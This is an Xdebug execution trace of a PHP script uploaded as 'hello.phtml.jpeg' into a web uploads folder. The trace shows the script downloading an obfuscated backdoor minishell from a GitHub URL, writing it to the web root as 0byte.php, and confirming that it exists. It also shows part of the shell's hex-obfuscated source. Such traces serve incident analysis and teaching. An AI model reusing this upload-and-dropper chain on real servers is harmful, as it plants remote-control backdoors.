Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:16:10.634103]
1	0	1	0.000174	393576
1	3	0	0.000287	412080	{main}	1		/var/www/html/uploads/hello.phtml.jpeg	0	0
1		A						/var/www/html/uploads/hello.phtml.jpeg	1	$source = 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
1		A						/var/www/html/uploads/hello.phtml.jpeg	1	$name = '0byte.php'
2	4	0	0.000339	412080	_summon	1		/var/www/html/uploads/hello.phtml.jpeg	1	2	'0byte.php'	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$filename = '0byte.php'
3	5	0	0.000369	412080	file_get_contents	0		/var/www/html/uploads/hello.phtml.jpeg	1	1	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
3	5	1	0.036699	428096
3	5	R			'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$fget = '<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$path = '/var/www/html/'
3	6	0	0.036872	428152	fopen	0		/var/www/html/uploads/hello.phtml.jpeg	1	2	'/var/www/html//0byte.php'	'w'
3	6	1	0.036919	428696
3	6	R			resource(5) of type (stream)
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$fileopen = resource(5) of type (stream)
3	7	0	0.036951	428568	fwrite	0		/var/www/html/uploads/hello.phtml.jpeg	1	2	resource(5) of type (stream)	'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
3	7	1	0.037009	428632
3	7	R			9202
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$execfile = 9202
2		A						/var/www/html/uploads/hello.phtml.jpeg	1	$shellurl = 'http://localhost/0byte.php'
3	8	0	0.037072	428680	file_exists	0		/var/www/html/uploads/hello.phtml.jpeg	1	1	'/var/www/html//0byte.php'
3	8	1	0.037091	428720
3	8	R			TRUE
2	4	1	0.037111	412888
1	3	1	0.037265	421192
			0.037296	320232
TRACE END   [2023-02-12 22:16:10.671256]

